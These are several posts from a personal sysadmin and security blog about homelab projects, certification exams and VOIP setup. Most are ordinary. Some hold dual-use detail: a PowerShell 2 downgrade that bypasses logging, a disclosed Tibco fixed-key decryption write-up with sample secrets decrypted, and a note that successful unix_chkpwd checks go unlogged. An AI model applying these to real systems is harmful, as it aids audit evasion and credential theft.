Thanks to K&J's class my todo list has grown tremendously. Between trainings and certifications added to my wishlist, I've also added a number of improvements that I would like to apply to my homelab. First and foremost: right-sizing my network segments and properly applying all local firewalls. This is a best-practice that will hinder lateral movement in simulations or real-world scenarios.


kilala.nl tags: , ,

View or add comments (curr. 0)

Powershell auditing: easy bypasses

2021-01-05 15:44:00

While I'm making my way through lab L1120 of BHIS' "Applied Purple Teaming" course, I noticed something interesting: none of my nefarious commands were showing up in HELK, despite me having enabled Powershell logging through a GPO.

In this lab, we're grabbing Sharphound.ps1 from the Bloodhound project, and either download and run it, or just load it into memory using Invoke-Expression. But none of that stuff was showing up in my Kibana dashboard, despite a "whoami" run from Powershell appearing correctly.

That's when I learned that A) downgrading your session to Powershell 2 kills all your logging, B) most of what you run in Powershell ISE (a script editor) is flat-out never logged. In my case: I make it a habit to work inside ISE, because I can easily edit script blocks.

See also this excellent blog post from 2018.

Luckily you can disable Powershell 2 with a GPO (which could end up breaking older scripts). But with regards to ISE: you'll have to completely uninstall, or deny-list it... if possible.

EDIT:

Based on this article by Microsoft themselves, it seems that turning on transcription will also work on Powershell ISE. I'll need to investigate a bit deeper... See if I haven't misconfigured my setup.

EDIT 2:

Yeah. The Powershell 2 logging bypass is valid, but the lack of logging through Powershell ISE was a case of #PEBCAK. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed AZ-900; experiences with OnVue exam at home

2021-01-02 14:48:00

It's nice when sidetracks during learning lead to measurable results. Case in point: while setting up the labs for the BHIS "Applied PurpleTeaming" training, I needed to quickly learn about Azure Cloud. ... And now I've passed the AZ-900 exam! :D

Microsoft offers (most of) their exams to take at-home remotely, through Pearson Vue's "OnVue" service. I already worked with OnVue back in August, when taking the Cloud+ beta exam. My experience this time around was very similar: the tooling works well, as long as you make sure to turn off your local outbound firewall like Little Snitch

As to the AZ-900 exam: it was a nice motivator (the proverbial carrot on the stick) for me to go through the six Azure Fundamentals modules on Microsoft Learn. I'm happy to have finally gotten some hands-on experience with Azure Cloud, or basically any cloud provider beyond running a shortlived VM on AWS.

After completing the BHIS APT training I intend to play around with Azure a bit more... Maybe I'll even rebuild this website on there!


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed RedHat EX407V27K, experiences with remote Kiosk exams

2020-12-23 23:06:00

As I mentioned earlier this week, I've been studying for RedHat's EX407 exam. Looking back at my CPE records / bookkeeping I've been at it an embarassingly long time: I started studying back in March of 2019. Almost two years ago! Just too many fun and interesting things kept coming in the way!

Between teaching Linux+ to a group of students, with passing CTT+, Linux+, CySA+ and CRTP, as well as classes on DFIR and PKI it was just tooooo tempting! And Ansible was just a little too boring! So as I said before: "booo!" to my lack of discipline! Dragging my feet on EX407 caused me to almost lose my RHCSA/RHCE certifications, because they needed to be renewed. 

But enough about that! Let's talk some interesting points!

All those study materials I linked to, especially Tomas' practice exam, proved to be absolute gold. Without them I wouldn't have passed, because pass I did! Out of a max of 300 (I think?) and with a passing grade of 210 I scored 239 points.

I dropped points mostly due to inexperience with Jinja2 templating and its logic (tests, loops) and with Ansible Galaxy and requirements-files. Out of 16 tasks I knew up front that I'd fail 3 of them because I couldn't get the playbooks to work correctly. Lessons learned and I'll definitely try to practice more in my homelab!

Finally, after being one of the first 100 people to take a Red Hat Kiosk exam, I'll also weigh in on Red Hat's remote, at-home exams. RH had fallen behind to its competitors in that regard, still forcing students to come in to testing centers. What with Covid-19, that strategy needed to change, fast. So they did, in September of this year.

All in all I very much appreciate Red Hat's remote, at-home testing. To sum it up: you flash a RH-provided Linux image to a USB drive, plug that into your PC and boot it up. This turns your private PC into a RH Kiosk system, exactly like they use in their official testing centers! The only vexing part of the setup is that you need TWO functioning web cams, one of which MUST be cabled and pointed at you from the side. 

Overall, the bootable Kiosk Linux is great. It provides pre-exam setup testing to ensure you can actually take the exam. From there on out things work exactly like, or actually better than, the Kiosk at the testing center. Testing from home is absolutely great! After my bad experiences with EX413 I'd been turned off of RH's exams, but this has turned me around a bit. 

I'm happy to have passed EX407! Time to go over my plan for the next few months! I have a few pen-testing classes lined up and will also need to prepare for teaching my next group of students!


kilala.nl tags: , ,

View or add comments (curr. 0)

RedHat EX407 / EX294 study materials

2020-12-17 08:39:00

I've been studying on and off for the EX407 Ansible exam for ... lemme check... 1.8 years now. Started in March of 2019, hoping to renew my RHCE in time, but then I kept on getting distracted. Two certs and three other studies further, I still need to pass EX407 to renew my RHCE. Way to go on that discipline! ( ; ^_^)

Anywho, there's a few resources that proved to be helpful along the way; thought I'd share them here. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Exploit: Tibco password decryption

2020-12-08 14:11:00

The following article is an exploit write-up which I published on my Github repository. It describes a security vulnerability I found in Tibco's software, which I submitted to the vendor through proper responsible disclosure. Now that Tibco have finished their follow-up, I am allowed to publish my findings.

 

Introduction

During a pen-test of an internally developed application, I discovered that the engineers in question had re-used a commercial Java library for password obfuscation.

While their application was not part of a Tibco stack, nor did it use Tibco, they did make use of Tibco's "ObfuscationEngine". On Tibco systems, this tool is used to obfuscate (and sometimes encrypt) passwords for safe storage in configuration files.

 

Update: previous works

My colleague Wouter R. referred me to a project from a few years ago, which apparently did the exact same attack: Thomas D's "tibcopasswordrevealer", built in Python. At the time of my pentest, nor up until an hour ago, was I aware of this previous work. Until my colleague pointed out the project, I had only found people re-using the "tibcrypt.jar" library.

 

Background

Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling:

Source, the documentation.

This write-up pertains to #3 above. The documentation states both:

"The fixed key […] does not provide the same level of security as the use of a machine key or a custom encryption key. It is used to encrypt an administration domain’s password.”

and

"Passwords encrypted using Obfuscate Utility cannot be decrypted. Ownership is with customers to remember passwords in clear text. There is no utility provided by TIBCO to decrypt passwords encrypted using Obfuscate Utility.”.

 

Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!.

For example:

#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA

 

Issues

The first statement does not make clear the risks that are involved, while the second statement is blatantly incorrect.

On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key.

For example:

I performed a pen-test on an application, where the above-mentioned ObfuscationEngine had made its way into their in-house code. Because I did not have access to Tibco's copyrighted libraries, I was happy to find one source online that had the older “tibcrypt.jar” available.

-> https://mvnrepository.com/artifact/tibco-ems/tibcrypt/4.1

 

By analyzing this JAR file, I recovered the fixed key. Using that I wrote a small Java utility that can decrypt any secret that was encrypted using the Tibco fixed key regardless whether Tibco libraries are available.

The code is provided in my Github repository as “decrypt.java”.

 

Impact

Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does not require access to Tibco software or libraries.

All you need are exfiltrated secret strings that start with the characters #!.

This is not going to be fixed by Tibco, this is a design decision also used for backwards compatibility in their software.

 

Instructions

Compile with:

	javac decrypt.java

 

Examples of running, with secrets retrieved from websites and forums:

	java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
7474

java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
tibco

Outcome

I have shared my findings internally with my client. I have advised them to A) stop including Tibco's copyrighted classes and libraries into their own Java applications, B) replace all secrets encrypted using this method, as they should be considered compromised.

The proof of concept code has been shared with the customer as part of the pen-test report.

I reported this situation to Tibco's responsible disclosure team (security@tibco.com) on September 9th 2020.

On December 8th Tibco's security team responded that they have updated the Tibco administrators documentation to make it clear that the fixed key method of ObfuscationEngine should not be considered secure.

-> https://docs.tibco.com/pub/runtime_agent/5.11.1/doc/pdf/TIB_TRA_5.11.1_installation.pdf?id=3

 

The text now reads:

"The fixed key is compatible with earlier versions of TIBCO Runtime Agent but should not be treated as secure. A machine key or custom encryption key should be used whenever possible."

 

CVE / Vulnerability information

No CVE was awarded as the vendor did not recognize this as a vulnerability. This is intended functionality, which "works as designed".


kilala.nl tags: ,

View or add comments (curr. 1)

Using the 3XC soft-phone through RDP (Linux and Windows)

2020-12-05 22:59:00

In order to simulate a "work-from-home" (WFH) situation in the lab, I'm very happy to test the 3CX web client. Their webapp supports a lot of the productivity features you'd expect and works with a browser extension (Edge and Chrome) to make actual calls. No need to install a soft-phone application, just grab the browser extension!

The RDP protocol supports the redirection of various types of hardware, including audio input and output. This requires that you enable this for your target host (or in general), for example in Royal TSX you would edit the RDP connection, go to Properties > Redirection and put a check in the box for Record audio from this computer. Also select Bring audio to this computer.

With a Windows target host it'll now work without a hassle.

Linux is a different story, but that's because the xRDP daemon needs a little massaging. Specifically, you will need to build a module or two extra for PulsaAudio. This isn't something you can easily "apt install", but the steps are simple enough. Full documentation over here.

After building and installing the modules, you'll need to logout and log back in. After that playing audio works and PulseAudio will have detected your system's microphone as well. 


kilala.nl tags: , ,

View or add comments (curr. 0)

State of the homelab: December 2020

2020-12-05 16:15:00

a map of the network

It's been a busy year! Between adding new hardware, working with Ansible and messing with forensics and VOIP, the lab has evolved. I'm very lucky to have all of this at my disposal and I'm grateful to everybody's who's helped me get where I am today. :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Running a VOIP/SIP homelab with 3CX (free) PBX

2020-12-05 15:25:00

the admin panel and phone app

Just yesterday, a lucrative dumpster dive netted me two brandnew IP desk phones, very spiffy Grandstream GPX2130 models. Because studying for my upcoming Ansible exam isn't much fun (OMG two weeks!!), procrastination struck!

Let's add VOIP to my simulated company Broehaha in my homelab!

Until this weekend I had zero experience with VOIP, SIP and the likes beyond using Cisco phones as an end-user. I'd heard plenty of colleagues talk about Asterisk and I remember hacking an Asterisk server in the PWK labs at Offensive Security, but that's about as far as my exposure went. 

Wanting to save time and to simulate an actual company, I quickly gave up on both Asterisk and FreeSwitch. As the meme goes: "Ain't nobody got time fo' that!"

A little search further led me to 3CX, a commercial PBX solution that provides a free edition for (very limited) small environments. They offer a Debian-based soft-appliance that you can deploy from ISO anywhere you like.

So:

Last night I spent from 2200-0100 mucking around with 3CX because no matter what I tried, the GXP2130 would not show up on the admin UI. The phone's in the network just fine and could also talk to 3CX, but there were a few steps missing.

Continuing this morning, I used tcpdump and other tools to ascertain that:

After lunch, things fell into place :)

  1. The phone's firmware was too old to PNP with 3CX. 
  2. Upgrading from 1.0.7.25 to 1.0.11.16 failed because the gap was too large. 

So... I upgrade the phone's firmware in four steps, using an on-prem update server. Then, after resetting the phone to factory defaults it showed up just fine and I could add it to one of my extensions!

the phone shows up

The cool part is that 3CX comes with a web UI for end-users, that also works with their browser extension for Chrome or Edge. Now I can simulate a working-from-home situation, with one user on a Windows 10 VM calling the "reception" on the Grandstream phone. Or vice versa. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Upgrading Grandstream GXP2130 from 1.0.7.x to 1.0.11.x

2020-12-05 13:43:00

With many thanks to my friends at ITVitae and some dumpster diving I snagged two brand-new Grandstream GXP2130 IP phones, to practice VOIP in my homelab. They're pretty sexy phones! Nice build quality and a very decent admin interface: a great first step into the world of VOIP / SIP. 

Out of the box, these two phones came with the dated 1.0.7.25 firmware. No matter what I tried, they refused to upgrade to the current version 1.0.11.16. Pointing them at the Granstream firmware site? Nothing. Pointing them at a local web server with the 1.0.11.16 firmware? Nothing. 

After a bit of searching, I found a helpful thread on the GS support forums that suggests that the firmware version gap is simply too great. We need to apply a few of the in-between versions, one by one.

As a work-around I built my own firmware upgrade server, in the VOIP network segment of my homelab. A simple CentOS 7 box with Apache. I then did the following:

cd /tmp
wget http://www.grandstream.com/sites/default/files/Resources/RingTone.zip
wget http://firmware.grandstream.com/Release_GXP2130_1.0.7.97.zip
wget http://firmware.grandstream.com/Release_GXP2130_1.0.8.56.zip
wget http://firmware.grandstream.com/Release_GXP2130_1.0.9.135.zip
wget http://firmware.grandstream.com/Release_GXP2130_1.0.11.3.zip
wget http://firmware.grandstream.com/Release_GXP2130_1.0.11.16.zip 

unzip RingTone.zip
for FILE in $(ls Release*zip); do unzip $FILE; done

cd /var/www/html
sudo mkdir 7 8 9 11

sudo cp /tmp/ring* 7/; sudo cp /tmp/Rel*.7.*/*bin 7/
sudo cp /tmp/ring* 8/; sudo cp /tmp/Rel*.8.*/*bin 8/
sudo cp /tmp/ring* 9/; sudo cp /tmp/Rel*.9.*/*bin 9/
sudo cp /tmp/ring* 11/; sudo cp /tmp/Rel*.11.*/*bin 11/

sudo chmod -R o+r *

From there on out, run a "sudo tail -f /var/log/httpd/access.log" to see if the phone is actually attempting to pick up the relevant update files.

Then, on the phone, login as "admin" and browse to Maintenance > Upgrade and Provisioning. Set the access method to HTTP. As the Firmware Server Path set the IP address of the newly built upgrade server (e.g. 192.168.210.100), followed by the version path. We will change this path for every version upgrade.

For example:

First update to 1.0.7.97: set the path, click Save and Apply, then at the top click Provision. You should see the phone downloading the firmware update in "access.log". Once the phone has rebooted, check the web interface for the current version number.

Then "lather, rince and repeat" for each consecutive version. After 7, upgrade to 8, then to 9, then to 11 (this works without issues). In the end you will have a Grandstream phone running 1.0.11.16, after starting at 1.0.7.25.

Afterwards: don't forget to reset the phone to factory defaults, so it will correctly join your PBX for auto-provisioning. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Fun in the homelab: Vagrant and ESXi

2020-12-02 19:16:00

It's been a while since I've worked in my homelab, between my day-job and my teaching gig there's just been no time at all. But, with my EX407 around the corner it's time to hammer Ansible home!

Of course, it's tempting to get sidetracked! So when Tomas' Lisenet practice exam for EX407 suggests I need five VMs with RHEL, I go and find a way to build those post-haste. Now that I've been playing with Vagrant more often, that's become a lot easier!

First, there's a dependency: you will need to download and install a recent version of VMware's OVFTool. Make sure that its binary is in your $PATH

After that, JosenK's Vagrant plugin for VMware ESXi makes life so, so easy! On my Linux workstation it was as easy as:

$ sudo apt install vagrant
$ vagrant plugin install vagrant-vmware-esxi
$ mkdir vagrant-first-try; cd vagrant-first-try
$ vagrant init
$ vi Vagrantfile

After which the whole Vagrantfile gets replaced as follows:

nodes = {
   "vagrant1.corp.broehaha.nl" => ["bento/centos-8", 1, 512, 50 ],
   "vagrant2.corp.broehaha.nl" => ["bento/centos-8", 1, 512, 50 ],
   "vagrant3.corp.broehaha.nl" => ["bento/centos-8", 1, 512, 50 ],
   "vagrant4.corp.broehaha.nl" => ["bento/centos-7", 1, 512, 50 ],
   "vagrant5.corp.broehaha.nl" => ["bento/centos-7", 1, 512, 50 ],
}

Vagrant.configure(2) do |config|
  nodes.each do | (name, cfg) |
    box, numvcpus, memory, storage = cfg
    config.vm.define name do |machine|

      machine.vm.box      = box
      machine.vm.hostname = name
machine.vm.synced_folder('.', '/Vagrantfiles', type: 'rsync')
      machine.vm.provider :vmware_esxi do |esxi|
        esxi.esxi_hostname         = '192.168.0.55'
        esxi.esxi_username         = 'root'
        esxi.esxi_password         = 'prompt:'
        esxi.esxi_virtual_network  = "Testbed"
        esxi.guest_numvcpus        = numvcpus
        esxi.guest_memsize         = memory
esxi.guest_autostart = 'true'
        esxi.esxi_disk_store       = '300GB'

      end
    end
  end
end

To explain a few things:

Any requirements? Yup!

 


kilala.nl tags: , , ,

View or add comments (curr. 1)

Chocolatey Git on Windows: where is my SSH configuration?!

2020-11-10 19:52:00

For a while now, I've been using Git + SSH on Windows 10 and I've been very content about the whole setup.

Git was installed using Chocolatey, just because it's easy and takes care of a few things for you. But it turns out it was a little bit "too much" in the background, as it turns out. 

I wanted to move my SSH files (private key, known_hosts etc) to OneDrive, thus changing the path to the files. I just couldn't figure out where the SSH client configuration for the Git from Chocolatey was tucked away. This Git does not use the default OpenSSH client delivered by Windows 10 C:\windows\system32\OpenSSH\ssh.

An hour of searching made me realize that "git.install", the package from Choco, includes a mini-Unix-like environment. It's not Git on Windows: it runs on MINGW-W64

I found the following files, which define the behavior of the Choco-installed Git + SSH:

In the latter file, you can set UserKnownHostsFile and IdentityFile to set the file path for the private key and known_hosts.


kilala.nl tags: , ,

View or add comments (curr. 0)

Updated: Running VirtualBox, Docker and Hyper-V on Windows 10

2020-11-09 20:53:00

A while back I wrote detailed instructions on how we managed to get VBox to run on Windows 10 with Hyper-V remaining enabled. This required a little tweaking, but it allowed us to retain all of the Win10 security features offered by Hyper-V.

Recently the VirtualBox team released version 6.1.16 which includes a number of improvements aimed at Windows 10 and "Windows Hypervisor Platform". 

You now no longer need any of the tweaks I described earlier! Vanilla VirtualBox 6.1.16 runs on top of Hyper-V and WHP without further issues. SHA2 hashing works well and GCrypt no longer needs to have its acceleration disabled! This makes life so much easier!


kilala.nl tags: , ,

View or add comments (curr. 0)

Understanding pam_unix and unix_chkpwd

2020-10-24 23:49:00

One of the benefits of teaching Linux to a group of young adults, is that it forces me to go back to the books myself. The Linux+ objectives cover a few things I haven't worked with yet (such as MDM), but also touches on things I haven't given much thought yet. Case in point: PAM.

Just about every Linux sysadmin certification exam requires that you can work with Pluggable Authentication Modules. They want you to make your SSHd or SU authenticates correctly, or to include pam_tally. So we learn about /etc/pam.conf and /etc/pam.d/* and how to setup an auth or session stack correctly. 

What led me down a rabbithole was this: what if I want to make a Python app that authenticates users? I found references to python-pam and other modules, but most discussions ended with: "You need to run as root, or add your application user to the shadow group."

Initially this felt odd to me because, aren't we teaching everybody that services shouldn't run as "root"? In the end it does make sense, of course, because if any arbitrary user could (ab)use PAM to verify another user's password that'd be problematic. The process might be very noisy, but you could still try to brute-force the password. 

One source of confusion was the pam_unix documentation, which states:

"A helper binary, unix_chkpwd(8), is provided to check the user's password when it is stored in a read protected database. This binary is very simple and will only check the password of the user invoking it. It is called transparently on behalf of the user by the authenticating component of this module. In this way it is possible for applications like xlock(1) to work without being setuid-root."

Stupidly my brain glossed over the important parts (I need sleep) and latched onto the "without being setuid-root". The important part being that it "will only check the password of the user invoking it". 

What made me finally understand the workings of unix_chkpwd is a project of Marco Bellaccini's that I found on Github -> chkpwd_buddy. It should me the proper way of interacting with unix_chkpwd as a non-root user: FIFO pipes. 

$ mkfifo /tmp/myfifo

$ echo -ne 'testing\0' > /tmp/myfifo &
$ /sbin/unix_chkpwd tess nullok < /tmp/myfifo
$ echo $?
0

$ echo -ne 'testing\0' > /tmp/myfifo &
$ /sbin/unix_chkpwd testaccount nullok < /tmp/myfifo
$ echo $?
7

$ sudo -i
# mkfifo /tmp/rootfifo

# echo -ne 'testing\0' > /tmp/rootfifo &
# /sbin/unix_chkpwd tess nullok < /tmp/rootfifo
# echo $?
0

# echo -ne 'testing\0' > /tmp/rootfifo &
# /sbin/unix_chkpwd testaccount nullok < /tmp/rootfifo
# echo $?
0

Root can verify both my "tess" password and the one on "testaccount", while I could only verify my own password with my normal account. 

What's interesting, is that only the failed validation attempt shows up in journalctl. The successful attempts are not registered:

$ sudo journalctl -t unix_chkpwd
Oct 22 16:08:53 kalivm unix_chkpwd[86131]: check pass; user unknown
Oct 22 16:08:53 kalivm unix_chkpwd[86131]: password check failed for user (test)

To sum it up, if you want a Python app to authenticate the running-user's identity, you can use the python_pam module. But if you want the Python app to authenticate any/every user, then it will need to run as "root". 


kilala.nl tags: , ,

View or add comments (curr. 0)

Running VirtualBox together with Hyper-V on Windows 10

2020-10-06 19:30:00

EDIT: The tweaks outlined in this blog post are no longer needed. Read this update!

Sometimes you just have an odd need or craving! You just have to have some spicy curry udon after midnight! You just have to get an old RAID controller to work in your homelab! Or in this case: you just really have to get VirtualBox and Hyper-V to play nice on Windows 10. 

That's something that just wouldn't fly until recently. But now it'll work!

 

I would like to extend my warmest thanks to my colleage Praveen K-P, who worked with me to figure all of this out. =)

 

Requirements

 

Caveats

These instructions are a work-in-progress and the solution is not 100% rock-solid.

Some mathematical functions, such as SHA2 or CRC, may fail depending on the OS you run in the VM. This means that outright installing an OS from DVD or ISO may fail during extraction: SHA1 or SHA2 checksums won't match up and the installer will refuse to continue. This is likely caused by the layered CPU virtualization and is under research with the VirtualBox team.

Also, please be careful when choosing base images for your VirtualBox VMs! Do not assume that you can trust every VM image on the Vagrant repositories! Only install images from trusted providers such as:

Installing untrusted base images may lead to malware infections or worse.

 

Installation

  1. Enabled the Windows optional feature "Windows Hypervisor Platform".
    1. Go to Add/Remove Programs → Turn Windows Features on/off.
    2. Make sure there are checkmarks at both "Hyper-V" and "Windows Hypervisor Platform".
  2. Install the latest VirtualBox, but at least >=6.1.10.
  3. Install Vagrant.

 

For example: running Kali Linux

Kali Linux is one of the distributions whose installation fails due to the caveat involving mathematical functions. So let's use Vagrant instead, which pulls pre-built images from an online repository. 

Open Powershell. Run the following commands:

        cd $HOME
        mkdir Vagrant; cd Vagrant;
        vagrant init kalilinux/rolling

Before continuing, edit the "vagrantfile" file (e.g. with Notepad) and replace this line:

       config.vm.box = "kalilinux/rolling"

 

With the following configuration. Edit the amount of RAM and CPUs to your liking. Me, I like 6GB and 3 cores.

    config.vm.define "kali" do |kali|
        kali.vm.box = "kalilinux/rolling"
        kali.vm.hostname = "haxor"

        kali.vm.provider "virtualbox" do |vb|
            vb.gui = true
            vb.memory = "6144"
            vb.cpus = 3
            vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]
        end

        kali.vm.synced_folder '.', '/vagrant', disabled: true

        kali.vm.provision "shell", inline: <<-SHELL
            echo "Here we would install..."
            [[ ! -d /etc/gcrypt ]] && mkdir /etc/gcrypt
            [[ ! -f /etc/gcrypt/hwf.deny ]] && echo "all" >> /etc/gcrypt/hwf.deny
        SHELL
    end

 

Save the configuration file and now run the following in Powershell: 

        vagrant up kali

The init-command sets up your "Vagrant" directory and basic configuration file. By editing the "vagrantfile" we can change a lot of the behavior, including the way Kali perceives the VirtualBox hypervisor. We also tweak GCrypt, so it will refuse to try hardware accellerated cryptography. Both are required to make hashing and other maths work better.

The up-command actually starts the build of the VM, after which it is booted. The first installation will take a few minutes, after that you can just manage the VM using the VirtualBox user interface. 

The Kali Linux Vagrant build includes the full graphical user interface! But you can also ssh -P 2222 vagrant@localhost  to login to the VM. Be sure to create your own account and to change all passwords!

 

GCrypt fix

Your Linux distribution may have problems performing SHA2 calculations correctly. According to this source, it’s “Because apt use sha256 method from libgcrypto20, but optimized too much. We can deny this opt. using configuration file /etc/gcrypt/hwf.deny.” 

        $ sudo bash
        # mkdir /etc/gcrypt
        # echo all >> /etc/gcrypt/hwf.deny
 

In addition, we learned that in our nested situation (VirtualBox on top of Hyper-V) it may be a good idea to change your VM's "paravirtualization interface" from "Normal" to "Minimal". #TIL that this is not about how VBox provides better performance, but about what paravirtualization information is passed to the guest OS. In my case this change did fix hashing problems. This change can be made manually by editing the VM settings in VirtualBox (VM → Settings → System → Acceleration → Paravirtualization interface), or in the Vagrant file:

        vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]

 

Example Vagrantfile with two VMs 

Vagrant.configure("2") do |config|

  config.vm.define "kali" do |kali|
    kali.vm.box = "kalilinux/rolling"
  kali.vm.hostname = "haxor"
    kali.vm.network "forwarded_port", guest: 22, host: 2222, host_ip: "127.0.0.1"
    kali.vm.network "forwarded_port", guest: 3389, host: 2389, host_ip: "127.0.0.1"

    kali.vm.provider "virtualbox" do |vb|
        vb.gui = true
        vb.memory = "6144"
        vb.cpus = 3
        vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]
    end

    kali.vm.synced_folder '.', '/vagrant', disabled: true
 
    kali.vm.provision "shell", inline: <<-SHELL
        echo "Here we would install..."
        [[ ! -d /etc/gcrypt ]] && mkdir /etc/gcrypt
        [[ ! -f /etc/gcrypt/hwf.deny ]] && echo "all" >> /etc/gcrypt/hwf.deny
SHELL

  end


  config.vm.define "centos8" do |centos8|
    centos8.vm.box = "centos/8"
    centos8.vm.hostname = "centos8"
    centos8.vm.box_check_update = true

    centos8.vm.network "forwarded_port", guest: 22, host: 2200, host_ip: "127.0.0.1"

    centos8.vm.provider "virtualbox" do |vb|
        vb.gui = false
        vb.memory = "1024"
       vb.cpus = 1
        vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]
   end

  centos8.vm.provision "shell", inline: <<-SHELL
        echo "Here we would install..."
        [[ ! -d /etc/gcrypt ]] && mkdir /etc/gcrypt
        [[ ! -f /etc/gcrypt/hwf.deny ]] && echo "all" >> /etc/gcrypt/hwf.deny
    SHELL

    centos8.vm.synced_folder '.', '/vagrant', disabled: true

  end

end

kilala.nl tags: , ,

View or add comments (curr. 0)

Finally! Red Hat offers at-home exams

2020-09-06 21:18:00

It's been a while in coming and I'm very happy they finally made it! Red Hat have joined the large number of companies who now offer at-home test taking for their professional certifications

I quite enjoyed the way CompTIA handled their at-home examinations, but it looks like Red Hat have taken a very different approach. I still need to take the EX407 exam, so I'd better take a quick look!

Back in 2013 I was one of the first hundred people to use the Red Hat Kiosk exams, still have the souvenir key chain on my laptop bag. Let's see if their at-home tests work better than the Kiosk ones. 


kilala.nl tags: , ,

View or add comments (curr. 1)

Taking the 2020 CompTIA Cloud+ beta

2020-08-13 11:35:00

It's become a bit of a hobby of mine, to take part in CompTIA's "beta" exams: upcoming versions of their certification tests, which are given a trial-run in a limited setting. I've gone through PenTest+, Linux+ and CySA+ so far :)

After failing to get through the payment process at PearsonVue a friendly acquaintaince at CompTIA helped me get access to the Cloud+ beta (whose new version will go live sometime early next year).

I sat the beta test this morning, using the new online, at-home testing provided by PearsonVue. Generally speaking I had the experiences as outlined in the big Reddit thread.

Most importantly, on MacOS the drag-n-drop on PBQs is really slow. You have to click and hold for three seconds before dragging something. Aside from that the experience was pleasurable and it all worked well enough.

I'm not as enthused about the Cloud+ beta as I was about Linux+ and PenTest+ at the time. The questions seemed very repetitive, sometimes very predictable (if "containers" was an option, two out of three times it'd be the correct answer) and some just unimaginative (just throw four abbreviations or acronyms at the test-taker, two or three of which are clearly unrelated). Knowing CompTIA I assume there will be plenty of fine-tuning happening in the next few months.

I'm pretty sure I didn't pass this one, but I'm happy to have had the chance to take a look :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Preparing for PearsonVue at home, online testing

2020-08-12 15:35:00

This Reddit thread offers a plethora of information on the at-home, online test taking offered by PearsonVue.

Big lesson I learned as MacOS user: disable Little Snitch and other filtering / security software while you're taking the test. It feels dirty, but to ensure the software does not encounter any hickups (which may result in you botching the test) you're going to have to. Better yet, don't disable, but quit the software because any popups on your screen will also alert the proctor.

Just to be safe, I made a dummy user account on my Macbook, so I can remove all trace of the software afterwards. Luckily it runs from your downloads folder and doesn't need any admin-level access.


kilala.nl tags: , ,

View or add comments (curr. 0)

Teaching helps you break habits

2020-08-09 19:39:00

It's hilarious how stuck in one's ways one can get. I mean, I've always typed:

netstat -a | grep LISTEN | grep ^tcp

While prepping slides for my students, imagine my mirth when I learned "there's a flag for that". Man, it pays to read man-pages. 

netstat -l4
ss -l4

#EternalNewbie 💖


kilala.nl tags: , ,

View or add comments (curr. 0)

Expanding my homelab: more 11th gen Dell

2020-08-01 20:21:00

R410 and R710

The Dell R410 in my homelab has served me very well so far! With a little upgrade of its memory it's run 20 VMs without any hassle. Finding this particular configuration when I did (at a refurbishing company) was a lucky strike: a decent price for a good pair of Xeons and two large disks. 

I've been wanting to expand my homelab, to mess around with vMotion, Veeam and other cool stuff. Add in the fact that I'd love to offer "my" students a chance to work with "real" virtualization (using my smaller R410) and you've got me scouring various sources for a somewhat bigger piece of kit. After trying a Troostwijk auction and poking multiple refurbishers I struck gold on the Tweakers.net classified ads! 

Pictured above is my new Dell R710, the slightly beefier sister of the R410. It has space for more RAM, for more disk drives and most importantly (for my own sanity): it's a 2U box with larger fans which produces a lot less noise than the R410. The seller even included the original X5550 CPUs seperately.

So! From the get-go I decided to Frankenstein the two boxes, so I could actually put the R410 to use for my students while keeping a bit more performance in my homelab. 

Moving that RAID1 set from the R410 to the R710 was an exciting exercise!

I really did not want to loose all of my VMs and homelab; I've put a year into the environment so far! Officially and ideally, I would setup VMware ESXi on the R710 and then migrate the VMs to the new host. There are many methods:

Couldn't I do it even faster? Well sure, but you can't simply move RAID sets between servers! Most importantly: you'll need similar or the same RAID controllers. In a very lucky break, both the R410 and the R710 have the Dell/LSI Perc 6i. So, on a wish and a prayer, I pludged the RAID set and told the receiving Perc 6i to import foreign configuration. And it worked! 

After booting ESXi from the SD card, it did not show any of the actual data which was a not-so-fun surprise. Turns out that one manual re-mount of the VMFS file system did the trick! All 24 VMs would boot!

So far she's a beaut! Now, onwards, to prep the R410 for my students.


kilala.nl tags: , ,

View or add comments (curr. 0)

CTT+ certification achieved!

2020-07-10 13:45:00

It's official! After passing the theoretical exam in June and completing the practical, virtual classroom assessment this week, I'm now officially CTT+ certified: CompTIA CTT+ Virtual Classroom Trainer Certification.

Many thanks to the people who supported me; you know who you are! 💝


kilala.nl tags: ,

View or add comments (curr. 0)

Dell 11G (11th generation) server firmware updates in 2020

2020-06-13 22:20:00

Update:

One Reddit user suggests that, while my suggested way of working is easier than others, it may also lead to "bricking" of servers: literally rendering them unusable, by applying firmware updates out of order. 

Their suggestion is to instead use the SUU (Server Update Utility) ISO image for the server in question, which may be run either from a booted Windows OS, or through the LCM (Life Cycle Manager). 

More information about the SUU can be found here at Dell.

Also, if you take a look at Dell's instruction video about using the SUU ISO from the LCM, I think we can all agree that this in fact the easiest method bar none. 

EDIT: If it weren't for the fact that the old LCM firmware on the R410 cannot read the SUU files. So you have to use this with Windows or CentOS.

 

TLDR:

If you want to skip all the blah-blah:

 

Introduction

Early in 2019 I purchase a Dell R410, part of Dell's eleventh generation (11G) server line-up from 2010/2011. Since then I've had a lot of fun growing and maintaining my homelab, learning things like Ansible and staying in touch with Linux and Windows administration. 

One task system administrators commonly perform, is the upgrading of firmware: the software that's built into hardware to make it work. If you check out the list of available firmware options for the R410, you'll see that quite a lot of that stuff goes into one simple server. Imagine what it's like to maintain all of that stuff for a whole rack, let alone a data center full of those things!

